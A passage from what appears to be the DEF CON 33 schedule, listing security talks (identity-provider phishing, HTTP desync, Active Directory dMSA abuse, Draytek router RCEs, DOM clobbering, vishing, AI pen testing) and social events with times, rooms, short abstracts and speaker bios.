Additionally, we'll discuss Chrome's forthcoming "Device Bound Session Cookies" (DBSC) technology, which aims to further mitigate session hijacking through cookie theft by implementing TPM chip-based encryption and requiring proof of possession of the cryptographic key.

SpeakerBio:  Rafael Felix

Rafael has been working with malware development for 4 years, also being involved in the malware community for more than 6 years. He is also experienced in Incident and Response, specifically during malware inner workings analysis. Currently, Rafael is a researcher for Hakai Offensive Security, being deeply involved with red-team operations.


Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 13:00-14:50 PDT


Title: StealthToken: Exploiting Identity Providers the Serverless Way
When: Saturday, Aug 9, 13:00 - 14:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 2 - Map

Description:
Introduction :

The workshop revolves around phishing techniques to capture yummy cookies & refresh tokens against highly targeted Identity Providers. Instead of using server based infrastructure, we will use server-less infra to launch stealth attacks rotating trusted implicit domains & integration directly with the productivity apps like slack, teams etc.

The flow of the workshop :

Workshop Duration : 120 Minutes

Speakers:Manish Gupta,Yash Bharadwaj

SpeakerBio:  Manish Gupta

Manish Gupta is Director of CyberWarFare Labs having 7.5+ years of expertise in offensive Information Security. Where he specializes in Red Teaming Activities on enterprise Environment. His Research interest includes Real World Cyber Attack Simulation and Advanced persistent Threat (APT). Previously he has presented his research at reputed conferences like Blackhat USA, DEFCON, Nullcon, BSIDES Chapters, X33fcon, NorthSec & other corporate trainings etc.

SpeakerBio:  Yash Bharadwaj

Yash Bharadwaj is a seasoned technologist with over 7.5 years of experience, currently serving as the Technical Director & Head of R&D at CyberWarfare Labs. Passionate about offensive security, he specializes in uncovering and analyzing emerging TTPs, building Red/Blue team infrastructure and simulating Identity Based Attacks. A sought-after speaker, he has conducted hands-on training & delivered talks at prestigious conferences such as BlackHat (USA, Asia, EU), Nullcon, X33fCon, NorthSec, and various BSides chapters. A recognized thought leader, he combines technical depth with business-aligned security leadership


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 14:00-15:59 PDT


Title: Sticker Swap at DEF CON 33
When: Saturday, Aug 9, 14:00 - 15:59 PDT
Where: LVCCWest-Level2-Corridor Near W234 - Map

Description:

You've seen us swamp chillout areas guerilla style with tables full of stickers, but now we finally got our act together and have a formal place and time. Come swap stickers, chat with creators, and join the growing subculture of sticker lovers. Follow @dcstickerswap on Twitter for updates.


Return to Index    -    Add to Google    -    ics Calendar file

- Sunday - 10:00-12:59 PDT


Title: Sticker Swap
When: Sunday, Aug 10, 10:00 - 12:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

Come stop by for our first offical event where we will have custom stickers for VX Underground, Skyhopper, and more!


Return to Index    -    Add to Google    -    ics Calendar file

- Saturday - 10:00-12:59 PDT


Title: Sticker Swap
When: Saturday, Aug 9, 10:00 - 12:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

Come stop by for our first offical event where we will have custom stickers for VX Underground, Skyhopper, and more!


Return to Index    -    Add to Google    -    ics Calendar file

- Friday - 10:00-12:59 PDT


Title: Sticker Swap
When: Friday, Aug 8, 10:00 - 12:59 PDT
Where: LVCCWest-Level2-W201-W202 - Map

Description:

Come stop by for our first offical event where we will have custom stickers for VX Underground, Skyhopper, and more!


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 13:00-13:45 PDT


Title: Stories from a Tor dev
When: Saturday, Aug 9, 13:00 - 13:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

What is it actually like to support and balance a global anonymity network, with users ranging from political dissidents to national security analysts? You say it's important to teach law enforcement and governments about privacy and end-to-end encryption, but how do those conversations go in practice? I heard you accidentally got Russia to block all of Azure for a day? Are you ever going to do a Tor talk in China? Wait, who exactly tried to bribe you to leave bugs in Tor to support their criminal schemes?

Historically I've tried to downplay some of the excitement from operating the Tor network and teaching the world about Tor, but this year I'm going to try my hand at the "war stories" track.

References:

SpeakerBio:  Roger "arma" Dingledine

Roger Dingledine is co-founder and original developer of the Tor Project, a nonprofit that develops free and open source software to protect people from tracking, censorship, and surveillance online. Roger works with journalists and activists on many continents to help them understand and defend against the threats they face, and he is a lead researcher in the online anonymity field. EFF picked him for a Pioneer Award, and Foreign Policy magazine chose him as one of its top 100 global thinkers.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 13:00-14:30 PDT


Title: Surfing through the Stream: Advanced HTTP Desync exploitation in the wild
When: Saturday, Aug 9, 13:00 - 14:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

Modern websites have evolved into complex, layered network architectures—creating fertile ground for serious protocol-level vulnerabilities that traditional tools often overlook. As web applications continue growing in complexity, critical vulnerabilities such as HTTP smuggling, first-request routing, and cache poisoning/deception become increasingly prevalent, underscoring the need for tooling that treats HTTP as it truly is: a stream-based protocol.

SpeakerBio:  Martin "tincho_508" Doyhenard, Security Researcher at PortSwigger

Martin is a Security Researcher at PortSwigger with over 10 years of experience specializing in web security and reverse engineering. Renowned for presenting multiples groundbreaking researches at premier conferences like Black Hat, DEFCON and RSA. Active participant in Capture The Flag (CTF) competitions and bug bounty programs, consistently uncovering critical vulnerabilities and driving innovation in cybersecurity.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 14:00-14:30 PDT


Title: Surviving the Dataclysm: Resistance through Resilience
When: Saturday, Aug 9, 14:00 - 14:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

We all know that Business Continuity and Disaster Recovery are vitally important to every organization - but what about individuals? Explore how to protect yourself and your loved ones through ever-growing data mining, PII breaches, and socio-political upheaval with best practice BCDR techniques.

SpeakerBio:  Rebecah Miller

Rebecah is a Business Continuity & Disaster Recovery consultant, creating and testing continuity and resilience plans across all organizational sectors. After working through a disaster at a company that was not prepared, she changed careers to focus on security and risk management in an effort to improve the resiliency of others.


Return to Index    -    Add to Google    -    ics Calendar file

PLV - Friday - 13:00-13:45 PDT


Title: Takes All Kinds: Building Onramps for Emergency Web Archiving in Ukraine and Beyond
When: Friday, Aug 8, 13:00 - 13:45 PDT
Where: LVCCWest-Level2-W231 - Map

Description:
SpeakerBio:  Quinn Dombrowski
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

RTV - Saturday - 16:00-16:50 PDT


Title: Tales from the NIST AI Pen Test Challenge - AI Pen Testing 101
When: Saturday, Aug 9, 16:00 - 16:50 PDT
Where: LVCCWest-Level1-Hall1-W405-Red Team Village/LVCC-L1-EHW1-405-Track 4 - Map

Description:

Attendees will get hands on with some AI pen testing techniques as based on the Instructor’s experiences from the NIST AI Pen Test Framework Challenge and industry best practices.

SpeakerBio:  Lee McWhorter

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 13:00-14:59 PDT


Title: Taskmooster
When: Saturday, Aug 9, 13:00 - 14:59 PDT
Where: LVCCWest-Level1-Atrium-East-Contest Stage

Description:

What happens when you gather 4 hackers together to complete silly tasks, rank their execution, and see who ends up with the most points at the end? Taskmooster, that’s what. Inspired by the UK game show Taskmaster, TaskMooster is brings lateral thinking, comedic tasks, and general shenanigans to DEF CON. What? You haven’t heard of Taskmaster? Seriously, stop reading this program right now and go watch at least one episode. All seasons are available to stream on YouTube, and it’s totally binge-worthy.

Come join the contestants as they see how they performed for each task and get graded by our very own TaskMooster. The winner gets to take home the coveted Golden Telephone and bragging rights for being the TaskMooster champion.

Participant Prerequisites

The participants are selected in advance. We will film the pre-con tasks in Maryland several months before DEF CON and then will convene on stage at DEF CON in August for the live event.

Pre-Qualification

None


Return to Index    -    Add to Google    -    ics Calendar file

PHV - Friday - 13:00-13:59 PDT


Title: Teaching Your Reverse Proxy to Think: Fingerprint-Based Bot Blocking & Dynamic Deception
When: Friday, Aug 8, 13:00 - 13:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

IP blocklists rot in minutes; fingerprints persist for months. Finch is a lightweight reverse proxy that makes allow, block, or route decisions based on TLS and HTTP fingerprints (JA3, JA4, JA4H, and HTTP/2), before traffic reaches your production servers or research honeypots. Layered on top, a custom AI agent monitors Finch’s event stream, silences boring bots, auto-updates rules, and even crafts stub responses for unhandled paths; so the next probing request gets a convincing reply. The result is a self-evolving, fingerprint-aware firewall that slashes bot noise and turns passive traps into dynamic deception.

SpeakerBio:  Adel Karimi, Member of Technical Staff at OpenAI

Adel is a security engineer at OpenAI with deep expertise in detecting and responding to “badness.” Outside of work, he builds open-source tools focused on threat detection, honeypots, and network fingerprinting—such as Finch, Galah, and Venator—and escapes to dark corners of the world to capture the beauty of the night sky.


Return to Index    -    Add to Google    -    ics Calendar file

CRE - Saturday - 14:00-14:30 PDT


Title: Tech Reclaimers
When: Saturday, Aug 9, 14:00 - 14:30 PDT
Where: LVCCWest-Level1-Hall4-Communities-C105 - Map

Description:

Return to Index    -    Add to Google    -    ics Calendar file

DL - Friday - 16:00-16:45 PDT


Title: Tengu Marauder v2
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W212 - Map

Description:

Designed for wireless security testing and autonomous reconnaissance, Tengu Marauder v2 is a multi-terrain open-source robotic platform. Built around a Raspberry Pi and using ROS2, it combines real-time motor control, RF monitoring, and sensor data streaming to facilitate remote operations in challenging environments. Over the initial architecture, the v2 platform brings major enhancements in system modularity, communication security, and operational flexibility. Designed for safe remote access using encrypted VPN tunnels, the robot allows internet-based control and telemetry without endangering the system to direct network threats. Tengu Marauder v2 provides a tough, scalable basis for incorporating autonomy and cyber capabilities into your mobile security toolset whether used for off-grid automation, robotics teaching, or red teaming.

Speakers:Lexie "L3xic0n" Thach,Munir Muhammad

SpeakerBio:  Lexie "L3xic0n" Thach

Lexie has worked in cybersecurity for ten years in various positions. During this time, she developed a strong affinity for electrical engineering, programming, and robotics engineering. Despite not having a traditional academic background, she has extensive hands-on experience from her eight years in the US Air Force, specializing in cybersecurity and tactical networks for aircraft missions and operations. Her focus on securing and testing the security of autonomous systems stems from these experiences, and she is passionate about sharing the techniques she has learned. She currently runs a local hackerspace in Philadelphia in support of DC215 called the Ex Machina Parlor where anyone can come to learn new hacking tools, try to build offensive or defensive security robots, and use 3D printers on standby for any prototyping people want.

SpeakerBio:  Munir Muhammad

Munir is a cybersecurity intern with the City of Philadelphia and a senior in college. He’s focused on learning how to keep computer systems safe from threats. He is especially interested in defensive security and enjoys finding new ways to protect networks and data. He is active in local tech meetups, works on open-source security projects, and is a member and community engagement coordinator at EMP (Ex Machina Parlor), a Philadelphia hackerspace where people can explore new hacking tools, build security robots, and use 3D printers for prototyping. He also supports students as a teaching assistant for software engineering courses. He is looking forward to meeting new people at DEF CON, learning from the community, and helping newcomers find their way into cybersecurity.


Return to Index    -    Add to Google    -    ics Calendar file

DL - Saturday - 16:00-16:45 PDT


Title: Tengu Marauder v2
When: Saturday, Aug 9, 16:00 - 16:45 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Designed for wireless security testing and autonomous reconnaissance, Tengu Marauder v2 is a multi-terrain open-source robotic platform. Built around a Raspberry Pi and using ROS2, it combines real-time motor control, RF monitoring, and sensor data streaming to facilitate remote operations in challenging environments. Over the initial architecture, the v2 platform brings major enhancements in system modularity, communication security, and operational flexibility. Designed for safe remote access using encrypted VPN tunnels, the robot allows internet-based control and telemetry without endangering the system to direct network threats. Tengu Marauder v2 provides a tough, scalable basis for incorporating autonomy and cyber capabilities into your mobile security toolset whether used for off-grid automation, robotics teaching, or red teaming.

Speakers:Lexie "L3xic0n" Thach,Munir Muhammad

SpeakerBio:  Lexie "L3xic0n" Thach

Lexie has worked in cybersecurity for ten years in various positions. During this time, she developed a strong affinity for electrical engineering, programming, and robotics engineering. Despite not having a traditional academic background, she has extensive hands-on experience from her eight years in the US Air Force, specializing in cybersecurity and tactical networks for aircraft missions and operations. Her focus on securing and testing the security of autonomous systems stems from these experiences, and she is passionate about sharing the techniques she has learned. She currently runs a local hackerspace in Philadelphia in support of DC215 called the Ex Machina Parlor where anyone can come to learn new hacking tools, try to build offensive or defensive security robots, and use 3D printers on standby for any prototyping people want.

SpeakerBio:  Munir Muhammad

Munir is a cybersecurity intern with the City of Philadelphia and a senior in college. He’s focused on learning how to keep computer systems safe from threats. He is especially interested in defensive security and enjoys finding new ways to protect networks and data. He is active in local tech meetups, works on open-source security projects, and is a member and community engagement coordinator at EMP (Ex Machina Parlor), a Philadelphia hackerspace where people can explore new hacking tools, build security robots, and use 3D printers for prototyping. He also supports students as a teaching assistant for software engineering courses. He is looking forward to meeting new people at DEF CON, learning from the community, and helping newcomers find their way into cybersecurity.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Friday - 14:30-15:30 PDT


Title: Testing Trust Relationships: Breaking Network Boundaries
When: Friday, Aug 8, 14:30 - 15:30 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

What do you do when your blind XXE is non functional when egress-out is seemingly blocked? What do you do when there are strict filters for your full read SSRF vulnerability? Modern infrastructure on the cloud has many nuances, especially with trust boundaries. This talk goes through how we can push these boundaries and achieve our offensive security goals by abusing easy to spin up infrastructure or techniques. The internet is a different place depending on where you're coming from.

Speakers:Michael Gianarakis,Jordan Macey

SpeakerBio:  Michael Gianarakis, Co-founder & CEO at Assetnote

Michael Gianarakis is the Co-founder and CEO of Assetnote, a pioneer in the Attack Surface Management (ASM) space and a recognized leader in helping organizations continuously monitor and secure their external attack surfaces. In 2025, Assetnote was acquired by Searchlight Cyber, where Michael now leads enterprise product.

SpeakerBio:  Jordan Macey, Assetnote
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 16:00-16:45 PDT


Title: The (Un)Rightful Heir: My dMSA Is Your New Domain Admin
When: Friday, Aug 8, 16:00 - 16:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

Delegated Managed Service Accounts (dMSA) are Microsoft’s shiny new addition to Active Directory in Windows Server 2025. Their primary goal was to improve the security of domain environments. As it turns out, that didn’t go so well.

In this talk, we introduce BadSuccessor - an attack that abuses dMSAs to escalate privileges in Active Directory. Crucially, the attack works even if your domain doesn’t use dMSAs at all.

We’ll demonstrate how a very common, and seemingly benign, permission in Active Directory can allow us to trick a Domain Controller into issuing a Kerberos ticket for any principal - including Domain Admins and Domain Controllers. Then we’ll take it a step further, showing how the same technique can be used to obtain the NTLM hash of every user in the domain - without ever touching the domain controller.

We’ll walk through how we found this attack, how it works, and its potential impact on AD environments

References:

SpeakerBio:  Yuval Gordon

Yuval Gordon is a Security Researcher at Akamai Technologies, specializing in Active Directory security and identity-based attacks. Yuval's research is focused on offensive security, malware analysis, and threat hunting.


Return to Index    -    Add to Google    -    ics Calendar file

BBV - Saturday - 10:00-10:59 PDT


Title: The Ars0n Framework V2 Beta
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level3-W326 - Map

Description:

After years of planning and development, the highly anticipated new version of rs0n's bug bounty hunting framework is ready to go! Aptly named The Ars0n Framework v2, this tool is specifically designed to help eliminate the friction for aspiring bug bounty hunters. This tool not only automates the most commonly used bug bounty hunting workflows but each section includes detailed lessons that help beginners understand the "Why?" behind the methodology. Finally (and perhaps most exciting of all), reports generated from the data collected provide the user with guidance at critical decision points based on rs0n's many years of bug bounty hunting experience. Simply put, this tool is designed to help beginners compete w/ the pros on Day 1, and the best part is it's absolutely FREE!

SpeakerBio:  Harrison "rs0n" Richardson

Harrison Richardson (rs0n) began his Cybersecurity career in the US Army as a 25B. After leaving the service, Harrison worked various contract and freelance jobs while completing his Masters in Cybersecurity from the University of Dallas. Harrison's first full-time job in the civilian sector was at Rapid7, where he worked as a senior security solutions engineer as part of their Applied Engineering Team. Today, Harrison works as a product security engineer coving web applications, cloud, and AI systems. In his free time, Harrison develops a wide range of open-source tools and works to provide educational content to the bug bounty community through YouTube & Twitch.


Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 17:10-17:40 PDT


Title: The Beauty of Reversing Swift Malware
When: Friday, Aug 8, 17:10 - 17:40 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Chistopher Lopez
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PAYV - Friday - 14:00-14:45 PDT


Title: The challenges of Sub-dermal Payments
When: Friday, Aug 8, 14:00 - 14:45 PDT
Where: LVCCWest-Level1-Hall2-W505 - Map

Description:
SpeakerBio:  Amal Graafstra, VivoKey
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MWV - Saturday - 14:30-14:59 PDT


Title: The Cookie Heist: How Cybercriminals Are Outsmarting Chrome's Latest Defenses
When: Saturday, Aug 9, 14:30 - 14:59 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Mrigakshi Goel
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

MWV - Friday - 14:00-14:15 PDT


Title: The creation of the Malmongotchi badge
When: Friday, Aug 8, 14:00 - 14:15 PDT
Where: LVCCWest-Level1-Hall1-W303 - Map

Description:
SpeakerBio:  Austin Worline
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 19:30-22:30 PDT


Title: The DEF CON Pool Party
When: Saturday, Aug 9, 19:30 - 22:30 PDT
Where: Sahara Azul Ultra Pool - Map

Description:

Join in on the official DEF CON Pool Party for Food, Drinks, and Music!


Return to Index    -    Add to Google    -    ics Calendar file

CPV - Friday - 16:30-16:59 PDT


Title: The depths that marketers will plummet to
When: Friday, Aug 8, 16:30 - 16:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

In the run up to Google’s plans to dump 3rd party cookies, marketing firms (a $1.7 TRILLION dollar industry) were sent into a complete panic. These firms relied heavily on 3rd party cookies in order to better attribute CPM (cost per 1000 clicks) and how many of those clicks turned into sales. So advertisers could better study human behavior and trends in order to more effectively sell products.

As a former Security Engineer at the Largest Independent Digital Marketing firm in the world, I had a unique view into the evils that these companies were developing in order to not only maintain a few into consumer trends but to increase these views, increase the invasiveness of these techniques, and increase the cooperation between all levels of the industry from display point (streaming service), device point (iPhone, TV), location points (via ISP), to sales point.

This talk is a peek under the curtain for the server side data harvesting that agencies have developed, and how they’ve managed to twist this further invasion into so-called consumer protection and increased privacy.

SpeakerBio:  4dw@r3

4dw@r3 (they/them) is a dedicated security and risk management expert with extensive experience navigating complex environments. Sean excels at developing a comprehensive understanding of intricate systems and crafting strategic roadmaps to revitalize security programs. By identifying high-risk areas and optimizing the use of existing resources, Sean removes barriers between teams to enhance communication and coordination, driving effective security outcomes. Beyond their professional pursuits, Sean finds joy in backpacking through the mountains with their adventurous Australian Shepherd and twins, embracing the serenity of nature and the thrill of exploration.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 11:00-11:25 PDT


Title: The Devil Wears Headsets
When: Saturday, Aug 9, 11:00 - 11:25 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

Watched the vishing competition and caught the bug? Welcome to the world of social engineering! Now let's turn that adrenaline into action. In this talk, I'm handing over the knowledge and worksheet that I use to plan my vishing calls, complete with pretext ideas, vishing tips and the kinds of pushback you might encounter on your calls. We'll dive into the art of social engineering over the phone. You'll learn how to build believable pretexts and what makes a voice sound trustworthy. I'll give you what you need to be ready to pick up the phone. You'll leave with everything you need, except a burner phone. And unlike Miranda Priestly, your targets won't even see you coming.

SpeakerBio:  Cronkitten

Cronkitten (they/them) is a cybersecurity professional, threat hunter, vishing competitor and relentless advocate for ethical social engineering. As a returning vishing competition contender Cronkitten thrives in the booth and on the phone. When they're not building new tools in the SOC, they're crafting pretexts, coaching newcomers, and teaching others how to dial with confidence, charisma and just the right amount of chaos (Ok, it's a lot of chaos, but the good kind). Equal parts charm and strategy, Cronkitten brings a hacker's mindset and a people-first approach to every call. Cronkitten says make that call, embrace the chaos and live in the meow-ment.


Return to Index    -    Add to Google    -    ics Calendar file

DCT - Saturday - 11:00-11:45 PDT


Title: The DOMino Effect: Automated Detection and Exploitation of DOM Clobbering Vulnerability at Scale
When: Saturday, Aug 9, 11:00 - 11:45 PDT
Where: LVCCWest-Level1-Hall3-Track 2 - Map

Description:

DOM Clobbering is a type of code-reuse attack on the web that exploits naming collisions between DOM elements and JavaScript variables for malicious consequences, such as Cross-site Scripting.

In this talk, we present a novel systematization of DOM Clobbering exploitation in four stages, integrating existing techniques while introducing new clobbering primitives. Based on this foundation, we introduce Hulk, the first dynamic analysis tool to automatically detect DOM Clobbering gadgets and generate working exploits end-to-end.

Our evaluation revealed an alarming prevalence of DOM Clobbering vulnerabilities across the web ecosystem. We discovered 497 zero-day DOM Clobbering gadgets in the Tranco Top 5,000 sites, affecting popular client-side libraries, including Google Client API, Webpack, Vite, Rollup, and Astro—all of which have since acknowledged and patched the issue.

To complete our exploitation chain, we further study its trigger---HTML Injection vulnerability. Our systematic analysis of HTML Injection uncovered over 200 websites vulnerable to HTML injection. By combining them with our discovered gadgets, we demonstrated complete attack chains in popular applications like Jupyter Notebook/JupyterLab, HackMD.io, and Canvas LMS. This research has resulted in 19 CVE identifiers being assigned to date.

Speakers:Zhengyu Liu,Jianjia Yu

SpeakerBio:  Zhengyu Liu

Zhengyu Liu is a Ph.D. student in Computer Science at Johns Hopkins University, advised by Prof. Yinzhi Cao. His research focuses on Web Security, with an emphasis on systematic vulnerability study through automated program analysis techniques, including static/dynamic analysis, and LLM-integrated approaches. His first-author work has been published in top-tier venues such as IEEE S&P 2024 and USENIX Security 2025, and has received the Best Student Paper Award at ICICS 2022. His research has led to the discovery of many zero-day vulnerabilities in widely used software such as Azure CLI, Google Client API Library, and Jupyter Notebook/JupyterLab, resulting in over 30 CVEs in popular open-source projects (>1K Stars in Github) and acknowledgments from Microsoft, Google, Meta, and Ant Group.

SpeakerBio:  Jianjia Yu

Jianjia Yu is a PhD student at Johns Hopkins University. Her research focuses on the security and privacy of web and mobile applications, using program analysis. She received a Distinguished Paper Award at CCS 2023 for her work on browser extension vulnerabilities.


Return to Index    -    Add to Google    -    ics Calendar file

SEV - Saturday - 11:30-11:55 PDT


Title: The Human Vulnerability: Social Engineering in a Hyper Connected World
When: Saturday, Aug 9, 11:30 - 11:55 PDT
Where: LVCCWest-Level3-W317-W319 - Map

Description:

In today's hyper-connected world, one vulnerability remains reliably exploitable: the human. Social engineering -- the manipulation of people to gain unauthorized access or extract sensitive information -- continues to outpace technical exploits in both effectiveness and stealth. But in the age of AI, these attacks are evolving faster, becoming more scalable, convincing, and harder to detect.

This talk explores the many faces of modern social engineering: from classic phishing, vishing, and physical intrusion, to AI-generated phishing emails, deepfake voice calls, and synthetic identities crafted by language models. We'll walk through real-world scenarios where attackers exploit trust, urgency, charm, and emotion—now enhanced by tools that can replicate human tone, write believable pretexts, and automate reconnaissance at scale.

You'll leave with a deeper understanding of how AI is supercharging social engineering, what this means for defenders and red teamers alike, and how to recognize the increasingly subtle cues of human-targeted compromise.

SpeakerBio:  fir3d0g

David has spent nearly 2 decades in cybersecurity, transitioning from systems and network administration to offensive security. He has successfully breached banks, law firms, government facilities, and more, all over the globe. David speaks at conferences nationwide, sharing knowledge and humorous stories. Prior to his career in cybersecurity, he served in the U.S. Army, including a tour in Iraq.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 21:00-01:59 PDT


Title: The Illuminati Party
When: Saturday, Aug 9, 21:00 - 01:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

The Illuminati Party is excited to open our doors once again to all those who wish to join us at DEF CON for an OPEN party welcoming all of our Hacker Family!


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Saturday - 20:00-23:59 PDT


Title: The Jasmine Dragon
When: Saturday, Aug 9, 20:00 - 23:59 PDT
Where: LVCCWest-Level2-W208 - Map

Description:

Step into The Jasmine Dragon, an exclusive underground gathering where tradition meets the digital age, and the beat flows like perfectly executed code. With DJ Iroh dropping martial arts-inspired hip-hop, expect deep cuts, heavy bass, and an atmosphere that fuses cyberpunk aesthetics with ancient strategy. This isn’t just a party—it’s a cipher, a meeting of minds where warriors and tacticians alike can connect, scheme, and unwind. But entry isn’t for just anyone; only those who hold the right Pai Sho tile will unlock the door to this hidden node.


Return to Index    -    Add to Google    -    ics Calendar file

PGE - Thursday - 19:30-22:30 PDT


Title: The KEVOPS Sellout Pool Party
When: Thursday, Aug 7, 19:30 - 22:30 PDT
Where: Sahara Azul Ultra Pool - Map

Description:

Join the KEVOPS Department for our 1st Annual Sellout Pool Party, supported by all of our amazing Exhibitors and Supporters! We'll have tacos and drinks and music all night!


Return to Index    -    Add to Google    -    ics Calendar file

HHV - Saturday - 14:00-14:59 PDT


Title: The Missing Link: Draytek’s New RCEs Complete the Chain
When: Saturday, Aug 9, 14:00 - 14:59 PDT
Where: LVCCWest-Level2-W229 - Map

Description:

Draytek routers are widely deployed edge devices trusted by thousands of organizations, and therefore remain a high-value target for attackers. Building on our prior DEFCON32 HHV presentation (https://www.youtube.com/watch?v=BiBMsw0N_mQ) on backdooring these devices, where we also exposed six vulnerabilities and released Draytek Arsenal (https://github.com/infobyte/draytek-arsenal), a toolkit to analyze Draytek firmware. We return with two new unauthenticated RCEs: CVE-2024-51138, a buffer overflow in STUN CGI handling, and CVE-2024-51139, an integer overflow in CGI parsing. When chained with our prior persistence techniques, these bugs enable a full device takeover and backdoor from the internet.

This talk provides an in-depth analysis of the new vulnerabilities and their exploitation strategies with demos and the full end-to-end exploitation chain. We’ll also explore their potential link to the mass Draytek reboot incidents of March 2025, suggesting that real-world exploitation of some of these vulnerabilities may already be underway. Attendees will gain insight into edge device exploitation, persistent compromise, and the importance of transparency and tooling in embedded security research.

Speakers:Octavio Gianatiempo,Gaston Aznarez

SpeakerBio:  Octavio Gianatiempo, Security Researcher at Faraday and a Computer Science student at the University of Buenos Aires
No BIO available
SpeakerBio:  Gaston Aznarez, Security Researcher at Faraday, focused on vulnerability research on IoT and embedded devices.
No BIO available

Return to Index    -    Add to Google    -    ics Calendar file

DCT - Friday - 10:00-10:45 PDT


Title: The One Bitcoin Heist: Making a custom Hashcat module to solve a decade-old puzzle challenge
When: Friday, Aug 8, 10:00 - 10:45 PDT
Where: LVCCWest-Level1-Hall3-Track 5 - Map

Description:

In 2014, someone by the name of Spencer Lucas released the “One Bitcoin Book“, a set of 20 clues that when solved, unlocked a bitcoin wallet containing one bitcoin (then valued at ~$400). Over 10 years and a six-figure price tag later, it remained unclaimed. In December 2024, the prize was finally claimed through a combination of human-solved solutions and a custom module for Hashcat designed to test various combinatorial possibilities for the unknown or uncertain clues.

This talk will cover the puzzle itself, how the answers unlocked the prize (through the brainwallet process), and the development of a custom Hashcat module to crack brainwallet passphrases using cheap, cloud-based GPU power. It will also discuss the challenges encountered along the way and the troubleshooting approaches used to overcome them.

References:

SpeakerBio:  Joseph "stoppingcart" Gabay

Joseph Gabay is a security researcher, hardware hacker, and robotics engineer with a passion for reverse engineering and tackling unique challenges. At DEF CON 29, they presented DoS: Denial of Shopping, where they analyzed and exploited shopping cart immobilization systems, and expanded further upon that work at DEF CON 31. Their work and research focuses on integrating knowledge from a diverse set of domains to deeply understand systems and uncover unique insights about their design and potential vulnerabilities.


Return to Index    -    Add to Google    -    ics Calendar file

HHV - Sunday - 12:30-12:59 PDT


Title: The Power(Point) Glove
When: Sunday, Aug 10, 12:30 - 12:59 PDT
Where: LVCCWest-Level2-W233 - Map

Description:

Inspired by the cult following of the Nintendo Power Glove, this talk explores an unconventional use as a presentation remote. Using a generic ESP32 dev board and basic C code, it becomes a Bluetooth keyboard controlling presentations with ease. In fact, I will deliver this talk using the same Power Glove.

In this beginner-friendly talk, I'll share my experience ""hacking"" the Nintendo Entertainment System (NES) accessory. I'll cover:

Attendees will learn how to replicate this project and add pizzazz to their presentations. I'll release the code, so you can spice up your own talks. Maybe you'll even use the Power Glove to pop a shell on a remote machine in your next Proof of Concept.

Note: This is a personal project developed independently and is not affiliated with or endorsed by Microsoft, Nintendo, or any other employer.

SpeakerBio:  Parsia "CryptoGangsta" Hakimian, Offensive Security Engineer at Microsoft

Parsia is an offensive security "engineer" at Microsoft. While not a full-time hunter, he has learned a great deal from hunts and the bug bounty community. He spends most of his time reading code and experimenting with static and dynamic analysis -- but wishing he was gaming.

Parsia has previously presented at DEF CON's main venue and the AppSec Village. When not breaking (or fixing) things, he plays videogames, D&D, spends time with family outside - and, as his wife jokes, "subjects himself to the tax and immigration systems of US and Canada".


Return to Index    -    Add to Google    -    ics Calendar file

CON - Saturday - 10:00-10:59 PDT


Title: The Pwnie Awards
When: Saturday, Aug 9, 10:00 - 10:59 PDT
Where: LVCCWest-Level1-Hall3-Track 1 - Map

Description:

The Pwnies are an annual awards ceremony celebrating and making fun of the achievements and failures of security researchers and the wider security community. Every year, members of the infosec community nominate the best research and exploits they’ve seen. The Pwnie Award nominations are judged by a panel of respected security researchers and former pwnie award recipients – the closest to a jury of peers a hacker is likely to ever get. At this event DEF CON attendees will get a first person look at some of the most groundbreaking research and hacks in the cyber security community of the past year, and the winners get some well deserved recognition from the broader community for the great work they’ve done.

Participant Prerequisites

We do not have any strict prerequisites. We publish nominees ahead of time to give people a heads up that they may want to attend DEF CON to accept the award if they win.

Pre-Qualification

